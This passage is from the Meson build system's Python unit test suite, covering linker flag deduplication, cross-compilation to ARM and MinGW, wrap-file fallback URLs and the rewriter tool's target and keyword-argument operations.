self.install_subdir_invalid_symlinks('191 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('191 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
linker = cc.linker
if not linker.export_dynamic_args(env):
raise unittest.SkipTest('Not applicable for linkers without --export-dynamic')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
with open(build_ninja, 'r', encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
lines = f.readlines()
for lib in ('-ldl', '-lm', '-lc', '-lrt'):
for line in lines:
if lib not in line:
continue
# Assert that the library appears exactly once on this line (i.e. it was deduplicated).
self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
# c_std defined in project options must also be in effect when compiling natively.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
nativefile = tempfile.NamedTemporaryFile(mode='w')
nativefile.write(textwrap.dedent('''\
[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'build_wrapper.py'))))
nativefile.flush()
self.meson_native_file = nativefile.name
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write(textwrap.dedent('''\
[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir)
def test_identity_cross_env(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
env = {
'CC_FOR_BUILD': '"' + os.path.join(testdir, 'build_wrapper.py') + '"',
}
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write(textwrap.dedent('''\
[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
if is_cygwin():
raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
# Build some libraries and install them
testdir = os.path.join(self.unit_test_dir, '68 static link/lib')
libdir = os.path.join(self.installdir, self.libdir)
oldprefix = self.prefix
self.prefix = self.installdir
self.init(testdir)
self.install(use_destdir=False)
# Test that the installed libraries work
self.new_builddir()
self.prefix = oldprefix
meson_args = ['-Dc_link_args=-L{}'.format(libdir),
'--fatal-meson-warnings']
testdir = os.path.join(self.unit_test_dir, '68 static link')
env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
self.init(testdir, extra_args=meson_args, override_envvars=env)
self.build()
self.run_tests()
def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None:
if is_sunos():
raise unittest.SkipTest('Solaris currently cannot override the linker.')
if not shutil.which(check):
raise unittest.SkipTest('Could not find {}.'.format(check))
envvars = [mesonbuild.envconfig.ENV_VAR_PROG_MAP['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if f'{lang}_ld' in mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP:
envvars.append(
mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP[f'{lang}_ld'])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
if isinstance(comp, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler,
mesonbuild.compilers.AppleClangObjCCompiler,
mesonbuild.compilers.AppleClangObjCPPCompiler)):
raise unittest.SkipTest('AppleClang is currently only supported with ld64')
if lang != 'rust' and comp.use_linker_args('bfd') == []:
raise unittest.SkipTest(
'Compiler {} does not support using alternative linkers'.format(comp.id))
self.assertEqual(comp.linker.id, expected)
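# Usage sketch, mirroring the calls below: _check_ld('ld.gold', 'gold', 'c', 'ld.gold')
# checks that setting the C linker environment variable (e.g. CC_LD) to 'gold'
# makes the detected C compiler report the 'ld.gold' linker id.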
def test_ld_environment_variable_bfd(self):
self._check_ld('ld.bfd', 'bfd', 'c', 'ld.bfd')
def test_ld_environment_variable_gold(self):
self._check_ld('ld.gold', 'gold', 'c', 'ld.gold')
def test_ld_environment_variable_lld(self):
self._check_ld('ld.lld', 'lld', 'c', 'ld.lld')
@skip_if_not_language('rust')
@skipIfNoExecutable('ld.gold') # need an additional check here because _check_ld checks for gcc
def test_ld_environment_variable_rust(self):
self._check_ld('gcc', 'gcc -fuse-ld=gold', 'rust', 'ld.gold')
def test_ld_environment_variable_cpp(self):
self._check_ld('ld.gold', 'gold', 'cpp', 'ld.gold')
@skip_if_not_language('objc')
def test_ld_environment_variable_objc(self):
self._check_ld('ld.gold', 'gold', 'objc', 'ld.gold')
@skip_if_not_language('objcpp')
def test_ld_environment_variable_objcpp(self):
self._check_ld('ld.gold', 'gold', 'objcpp', 'ld.gold')
@skip_if_not_language('fortran')
def test_ld_environment_variable_fortran(self):
self._check_ld('ld.gold', 'gold', 'fortran', 'ld.gold')
@skip_if_not_language('d')
def test_ld_environment_variable_d(self):
# At least for me, ldc defaults to gold, and gdc defaults to bfd, so
# let's pick lld, which isn't the default for either (currently)
self._check_ld('ld.lld', 'lld', 'd', 'ld.lld')
def compute_sha256(self, filename):
with open(filename, 'rb') as f:
return hashlib.sha256(f.read()).hexdigest()
def test_wrap_with_file_url(self):
testdir = os.path.join(self.unit_test_dir, '74 wrap file url')
source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz')
patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz')
wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap')
source_hash = self.compute_sha256(source_filename)
patch_hash = self.compute_sha256(patch_filename)
wrap = textwrap.dedent("""\
[wrap-file]
directory = foo
source_url = http://server.invalid/foo
source_fallback_url = file://{}
source_filename = foo.tar.xz
source_hash = {}
patch_url = http://server.invalid/foo
patch_fallback_url = file://{}
patch_filename = foo-patch.tar.xz
patch_hash = {}
""".format(source_filename, source_hash, patch_filename, patch_hash))
with open(wrap_filename, 'w') as f:
f.write(wrap)
self.init(testdir)
self.build()
self.run_tests()
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache'))
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo'))
os.unlink(wrap_filename)
def test_no_rpath_for_static(self):
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
self.build()
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertIsNone(build_rpath)
def test_lookup_system_after_broken_fallback(self):
# Just to generate libfoo.pc so we can test system dependency lookup.
testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen')
self.init(testdir)
privatedir = self.privatedir
# Write a test project where the first dependency() returns not-found
# because the 'broken' subproject does not exist, but that should not
# prevent the 2nd dependency() from being looked up on the system.
self.new_builddir()
with tempfile.TemporaryDirectory() as d:
with open(os.path.join(d, 'meson.build'), 'w') as f:
f.write(textwrap.dedent('''\
project('test')
dependency('notfound', fallback: 'broken', required: false)
dependency('libfoo', fallback: 'broken', required: true)
'''))
self.init(d, override_envvars={'PKG_CONFIG_LIBDIR': privatedir})
def test_as_link_whole(self):
testdir = os.path.join(self.unit_test_dir, '78 as link whole')
self.init(testdir)
with open(os.path.join(self.privatedir, 'bar1.pc')) as f:
content = f.read()
self.assertIn('-lfoo', content)
with open(os.path.join(self.privatedir, 'bar2.pc')) as f:
content = f.read()
self.assertNotIn('-lfoo', content)
def test_prelinking(self):
# Prelinking currently only works with sufficiently new GNU toolchains.
# Skip everything else. When support for other toolchains is added,
# remove limitations as necessary.
if is_osx():
raise unittest.SkipTest('Prelinking not supported on Darwin.')
if 'clang' in os.environ.get('CC', 'dummy'):
raise unittest.SkipTest('Prelinking not supported with Clang.')
gccver = subprocess.check_output(['cc', '--version'])
if b'7.5.0' in gccver:
raise unittest.SkipTest('GCC on Bionic is too old to be supported.')
testdir = os.path.join(self.unit_test_dir, '88 prelinking')
self.init(testdir)
self.build()
outlib = os.path.join(self.builddir, 'libprelinked.a')
ar = shutil.which('ar')
self.assertTrue(os.path.exists(outlib))
self.assertTrue(ar is not None)
p = subprocess.run([ar, 't', outlib],
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
universal_newlines=True, timeout=1)
obj_files = p.stdout.strip().split('\n')
self.assertEqual(len(obj_files), 1)
self.assertTrue(obj_files[0].endswith('-prelink.o'))
class BaseLinuxCrossTests(BasePlatformTests):
# Don't pass --libdir when cross-compiling. We have tests that
# check whether meson auto-detects it correctly.
libdir = None
def should_run_cross_arm_tests():
return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BaseLinuxCrossTests):
'''
Tests that cross-compilation to Linux/ARM works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')
def test_cflags_cross_environment_pollution(self):
'''
Test that the CFLAGS environment variable does not pollute the cross
environment. This can't be an ordinary test case because we need to
inspect the compiler database.
'''
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
compdb = self.get_compdb()
self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])
def test_cross_file_overrides_always_args(self):
'''
Test that $lang_args in cross files always override get_always_args().
Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
architectures such as some Android versions and Raspbian.
https://github.com/mesonbuild/meson/issues/3049
https://github.com/mesonbuild/meson/issues/3089
'''
testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
self.build()
def test_cross_libdir(self):
# When cross compiling "libdir" should default to "lib"
# rather than "lib/x86_64-linux-gnu" or something like that.
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'lib')
return
self.assertTrue(False, 'Option libdir not in introspect data.')
def test_cross_libdir_subproject(self):
# Guard against a regression where calling "subproject"
# would reset the value of libdir to its default value.
testdir = os.path.join(self.unit_test_dir, '77 subdir libdir')
self.init(testdir, extra_args=['--libdir=fuf'])
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'fuf')
return
self.assertTrue(False, 'Libdir specified on command line gets reset.')
def test_std_remains(self):
# c_std defined in project options must also be in effect when cross compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-std=c99')
self.build()
@skipIfNoPkgconfig
def test_pkg_config_option(self):
if not shutil.which('arm-linux-gnueabihf-pkg-config'):
raise unittest.SkipTest('Cross-pkgconfig not found.')
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
def test_run_native_test(self):
'''
https://github.com/mesonbuild/meson/issues/7997
Check that a native test can be run in a cross build without an exe wrapper.
'''
testdir = os.path.join(self.unit_test_dir, '89 run native test')
stamp_file = os.path.join(self.builddir, 'native_test_has_run.stamp')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(stamp_file)
self.run_tests()
self.assertPathExists(stamp_file)
def should_run_cross_mingw_tests():
return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BaseLinuxCrossTests):
'''
Tests that cross-compilation to Windows/MinGW works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')
def test_exe_wrapper_behaviour(self):
'''
Test that an exe wrapper that isn't found doesn't cause compiler sanity
checks and compiler checks to fail, but causes configure to fail if it
requires running a cross-built executable (custom_target or run_target)
and causes the tests to be skipped if they are run.
'''
testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
# Configures, builds, and tests fine by default
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
os.mkdir(self.builddir)
# Change cross file to use a non-existing exe_wrapper and it should fail
self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
# Force tracebacks so we can detect them properly
env = {'MESON_FORCE_BACKTRACE': '1'}
error_message = "An exe_wrapper is needed but was not found. Please define one in cross file and check the command and/or add it to PATH."
with self.assertRaises(MesonException) as cm:
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Drun-target=false',
inprocess=True,
override_envvars=env)
self.assertEqual(str(cm.exception), error_message)
with self.assertRaises(MesonException) as cm:
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Dcustom-target=false',
inprocess=True,
override_envvars=env)
self.assertEqual(str(cm.exception), error_message)
self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
override_envvars=env)
self.build()
with self.assertRaises(MesonException) as cm:
# Must run in-process or we'll get a generic CalledProcessError
self.run_tests(inprocess=True, override_envvars=env)
self.assertEqual(str(cm.exception),
"The exe_wrapper defined in the cross file 'broken' was not found. Please check the command and/or add it to PATH.")
@skipIfNoPkgconfig
def test_cross_pkg_config_option(self):
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
class PythonTests(BasePlatformTests):
'''
Tests that verify compilation of python extension modules
'''
def test_versions(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))
testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
# No python version specified, this will use meson's python
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
# When specifying a known name (python2 / python3), the module
# will also try 'python' as a fallback and use it if the major
# version matches
try:
self.init(testdir, extra_args=['-Dpython=python2'])
self.build()
self.run_tests()
except unittest.SkipTest:
# python2 is not necessarily installed on the test machine. If it
# is not, or the python headers can't be found, the test will raise
# MESON_SKIP_TEST. We could check beforehand what version of python
# is available, but that is a bit of a chicken-and-egg situation,
# as it is the job of the module, so we just ask for forgiveness
# rather than permission.
pass
self.wipe()
for py in ('pypy', 'pypy3'):
try:
self.init(testdir, extra_args=['-Dpython=%s' % py])
except unittest.SkipTest:
# Same as above, pypy2 and pypy3 are not expected to be present
# on the test system, the test project only raises in these cases
continue
# We have a pypy, this is expected to work
self.build()
self.run_tests()
self.wipe()
# The test is configured to error out with MESON_SKIP_TEST
# in case it could not find python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=not-python'])
self.wipe()
# While dir is an external command on both Windows and Linux,
# it certainly isn't python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=dir'])
self.wipe()
class RewriterTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.maxDiff = None
def prime(self, dirname):
copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)
def rewrite_raw(self, directory, args):
if isinstance(args, str):
args = [args]
command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, timeout=60)
print('STDOUT:')
print(p.stdout)
print('STDERR:')
print(p.stderr)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
if not p.stderr:
return {}
return json.loads(p.stderr)
def rewrite(self, directory, args):
if isinstance(args, str):
args = [args]
return self.rewrite_raw(directory, ['command'] + args)
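# Usage sketch: the tests below call e.g.
#   out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
# and get back, as a Python dict, the JSON that the rewriter printed on stderr
# (an empty dict if nothing was printed).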
def test_target_source_list(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_add_sources_abs(self):
self.prime('1 basic')
abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
self.rewrite(self.builddir, add)
out = self.rewrite(self.builddir, inf)
expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
self.assertDictEqual(out, expected)
def test_target_remove_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_subdir(self):
self.prime('2 subdirs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
self.assertDictEqual(list(out['target'].values())[0], expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(list(out['target'].values())[0], expected)
def test_target_remove(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_remove_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, {})
def test_target_add_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)
def test_target_source_sorting(self):
self.prime('5 sorting')
add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
out = self.rewrite(self.builddir, add_json)
out = self.rewrite(self.builddir, inf_json)
expected = {
'target': {
'exe1@exe': {
'name': 'exe1',
'sources': [
'aaa/a/a1.c',
'aaa/b/b1.c',
'aaa/b/b2.c',
'aaa/f1.c',
'aaa/f2.c',
'aaa/f3.c',
'bbb/a/b1.c',
'bbb/b/b2.c',
'bbb/c1/b5.c',
'bbb/c2/b7.c',
'bbb/c10/b6.c',
'bbb/a4.c',
'bbb/b3.c',
'bbb/b4.c',
'bbb/b5.c',
'a1.c',
'a2.c',
'a3.c',
'a10.c',
'a20.c',
'a30.c',
'a100.c',
'a101.c',
'a110.c',
'a210.c',
'a666.c',
'b1.c',
'c2.c'
]
}
}
}
self.assertDictEqual(out, expected)
def test_target_same_name_skip(self):
self.prime('4 same name targets')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'myExe', 'sources': ['main.cpp']}
self.assertEqual(len(out['target']), 2)
for val in out['target'].values():
self.assertDictEqual(expected, val)
def test_kwargs_info(self):
self.prime('3 kwargs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
'dependency#dep1': {'required': True, 'method': 'cmake'}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_add(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD', 'Boost']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': 'GPL'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove_regex(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': 'debug=true'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {},
'target#tgt1': {},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
